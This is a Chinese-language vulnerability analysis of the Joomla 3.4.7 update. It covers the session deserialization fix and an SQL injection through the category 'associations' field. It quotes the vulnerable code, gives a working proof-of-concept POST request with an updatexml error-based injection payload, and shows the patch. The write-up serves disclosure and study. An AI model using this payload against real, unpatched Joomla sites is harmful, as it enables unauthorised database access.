作者: Mars@0kee Team
Joomla! 官方12月21号发布了3.4.7 新版程序,其中修复了Session序列化和一处SQL注入。
反序列化漏洞修复分析
前一阵子 Joomla 的对象注入很火,而官方 3.4.6 的修复仅仅是严格过滤了 X_FORWARDED_FOR 和注释了 USER_AGENT 存入 SESSION 那一句,见:https://github.com/joomla/joomla-cms/commit/995db72ff4eaa544e38b4da3630b7a1ac0146264#diff-aba80b5850bf0435954b29dece250cbfL1021,这样只是指哪补哪,治标不治本。看来官方上次的修复只是临时解决方案,这次的更新(3.4.7)算是彻底解决了此问题。
上次的对象注入,需要满足三个条件:
1. 自己实现session的处理方式,重新实现了 session 存储的read()和write()方法,但是并没有对 session 的值进行安全处理。
2. Mysql非strict mode下,使用utf8mb4字符 xF0x9Dx8Cx86 来截断。
3. PHP <= 5.6.13 session中反序列化解析的BUG。
(详情请看P牛文章:http://drops.wooyun.org/papers/11330 )
Joomla 官方也只能解决第一个,也就是改进session的处理方式。这次更新,在 libraries/cms/version/version.php 中,将SESSION存储在内部的Registry类对象中,弃用了以前使用 $_SESSION[$namespace][$name] 的方式:
$this->data = new JoomlaRegistryRegistry;
并且,在写SESSION的时候会先做base64_encode,
public function close(){
if ($this->_state !== 'active'){
// @TODO :: generated error here
return false;
}
$session = JFactory::getSession();
$data = $session->getData();
// Before storing it, let's serialize and encode the JRegistry object
$_SESSION['joomla'] = base64_encode(serialize($data));
session_write_close();
return true;
}
这样,$_SESSION就只剩下了$_SESSION['joomla'],而且$_SESSION['joomla'] 只存储了Registry的对象$data,在执行read()和write()时候,SESSION是经过base64_encode后的数据,就不会存在read()之后自动反序列化而导致对象注入了。
在反序列化的时候也不存在unserialize参数可控的情况。(可控的只是$data的成员变量)
if (isset($_SESSION['joomla']) && !empty($_SESSION['joomla'])){
$data = $_SESSION['joomla'];
$data = base64_decode($data);
$this->data = unserialize($data);
}
Joomla官方这次的解决方案比较好,不像上次那样治标不治本,这样的态度值得称赞。反观Apache对struts2 漏洞的修复…就不说了。
SQL注入
一、漏洞分析
代码位于,administrator/components/com_categories/models/category.php,save()函数内:
$assoc = $this->getAssoc();
if ($assoc)
{
// Adding self to the association
$associations = $data['associations'];
foreach ($associations as $tag => $id)
{
if (empty($id))
{
unset($associations[$tag]);
}
}
// Detecting all item menus
$all_language = $table->language == '*';
if ($all_language && !empty($associations))
{
JError::raiseNotice(403, JText::_('COM_CATEGORIES_ERROR_ALL_LANGUAGE_ASS
OCIATED'));
}
$associations[$table->language] = $table->id;
// Deleting old association for these items
$db = $this->getDbo();
$query = $db->getQuery(true)
->delete('#__associations')
->where($db->quoteName('context') . ' = ' . $db->quote($this->associatio
nsContext))
->where($db->quoteName('id') . ' IN (' . implode(',', $associations) . '
)');
$db->setQuery($query);
$db->execute();
if ($error = $db->getErrorMsg())
{
$this->setError($error);
return false;
}
if (!$all_language && count($associations))
{
// Adding new association for these items
$key = md5(json_encode($associations));
$query->clear()
->insert('#__associations');
foreach ($associations as $id)
{
$query->values($id . ',' . $db->quote($this->associationsContext) .
',' . $db->quote($key));
}
$db->setQuery($query);
$db->execute();
if ($error = $db->getErrorMsg())
{
$this->setError($error);
return false;
}
}
}
其中的 $associations 未经过适当处理、我们跟着流程来看看。
首先,$assoc = $this->getAssoc(); 为 True 的时候整个逻辑才能进来,这个getAssoc()是什么呢?跟进getAssoc()的实现(文件的 1234 行),发现关键是在:
$assoc = JLanguageAssociations::isEnabled();
搜索一下,发现 JLanguageAssociations 是 Joomla 的一个多语言插件http://www.slideshare.net/erictiggeler/creating-a-multilingual-site-in-joomla-joomla-3-beginners-guide-eric-tiggeler , 这个插件是 Joomla 自带的,默认没有开启,我们在后台将他开启。
然后,继续看代码,$associations = $data['associations'];, $data是post过来的数据,associations没有经过过滤就传到了SQL语句中:
$query = $db->getQuery(true)
->delete('#__associations')
->where($db->quoteName('context') . ' = ' . $db->quote($this->as
sociationsContext))
->where($db->quoteName('id') . ' IN (' . implode(',', $associati
ons) . ')');
导致SQL注入。
那 Joomla 有没有全局过滤呢?我们看看 Joomla 是如何处理POST数据的。
在 libraries/legacy/controller/form.php , save() 函数,
public function save($key = null, $urlVar = null){
...
$data = $this->input->post->get('jform', array(), 'array');
...
$validData = $model->validate($form, $data);
validate() 函数在 libraries/legacy/model/form.php 302行, 他又调用了libraries/joomla/form/form.php 的filter() 函数,具体实现就不继续了,总之这里的POST参数只是处理了 ' XSS and specified bad code. '。
最后,构造POC。在修改分类,保存的时候,修改POST数据:
POST /Joomla/administrator/index.php?option=com_categories&extension=com_content
&layout=edit&id=19
jform[title]=Joomla!&jform[alias]=joomla&jform[description]=&jform[parent_id]=14
&jform[published]=1&jform[access]=1&jform[language]=*&jform[note]=&jform[version
_note]=&jform[created_time]=2011-01-01+00:00:01&jform[created_user_id]=945&jform
[modified_time]=2015-12-23+08:09:46&jform[modified_user_id]=945&jform[hits]=0&jf
orm[id]=19&jform[metadesc]=&jform[metakey]=&jform[metadata][author]=&jform[metad
ata][robots]=&jform[associations][en-GB]=2) or updatexml(1,concat(0x7e,(version(
))),0) -- -&jform[rules][core.create][1]=&jform[rules][core.delete][1]=&jform[ru
les][core.edit][1]=&jform[rules][core.edit.state][1]=&jform[rules][core.edit.own
][1]=&jform[rules][core.create][13]=&jform[rules][core.delete][13]=&jform[rules]
[core.edit][13]=&jform[rules][core.edit.state][13]=&jform[rules][core.edit.own][
13]=&jform[rules][core.create][6]=&jform[rules][core.delete][6]=&jform[rules][co
re.edit][6]=&jform[rules][core.edit.state][6]=&jform[rules][core.edit.own][6]=&j
form[rules][core.create][7]=&jform[rules][core.delete][7]=&jform[rules][core.edi
t][7]=&jform[rules][core.edit.state][7]=&jform[rules][core.edit.own][7]=&jform[r
ules][core.create][2]=&jform[rules][core.delete][2]=&jform[rules][core.edit][2]=
&jform[rules][core.edit.state][2]=&jform[rules][core.edit.own][2]=&jform[rules][
core.create][3]=&jform[rules][core.delete][3]=&jform[rules][core.edit][3]=&jform
[rules][core.edit.state][3]=&jform[rules][core.edit.own][3]=&jform[rules][core.c
reate][4]=&jform[rules][core.delete][4]=&jform[rules][core.edit][4]=&jform[rules
][core.edit.state][4]=&jform[rules][core.edit.own][4]=&jform[rules][core.create]
[5]=&jform[rules][core.delete][5]=&jform[rules][core.edit][5]=&jform[rules][core
.edit.state][5]=&jform[rules][core.edit.own][5]=&jform[rules][core.create][10]=0
&jform[rules][core.delete][10]=&jform[rules][core.edit][10]=&jform[rules][core.e
dit.state][10]=&jform[rules][core.edit.own][10]=&jform[rules][core.create][12]=0
&jform[rules][core.delete][12]=&jform[rules][core.edit][12]=&jform[rules][core.e
dit.state][12]=&jform[rules][core.edit.own][12]=&jform[rules][core.create][8]=&j
form[rules][core.delete][8]=&jform[rules][core.edit][8]=&jform[rules][core.edit.
state][8]=&jform[rules][core.edit.own][8]=&jform[params][category_layout]=&jform
[params][image]=&jform[params][image_alt]=&jform[extension]=com_content&task=cat
egory.apply&2ebbc80d46dda42570c1b1699a58323d=1
成功注入。
另外,libraries/legacy/model/admin.php 这里也存在着同样的问题。
二、修复方案
官方增加了
...
$associations = JoomlaUtilitiesArrayHelper::toInteger($associations);
...
$query->values(((int) $id) .',' .$db->quote($this->associationsContext) . ',' .$
db->quote($key));
...
将$associations 中的所有值转换为int型。还有将 $id 强制转换为int。
参考:
http://drops.wooyun.org/papers/11330
http://drops.wooyun.org/papers/11371
http://bobao.360.cn/learning/detail/2501.html
https://github.com/joomla/joomla-cms/commit/2cd4ef682f0cab6ff03200b79007a25f19c6690e
https://www.joomla.org/announcements/release-news/5643-joomla-3-4-7.html
发表评论
您还未登录,请先登录。
登录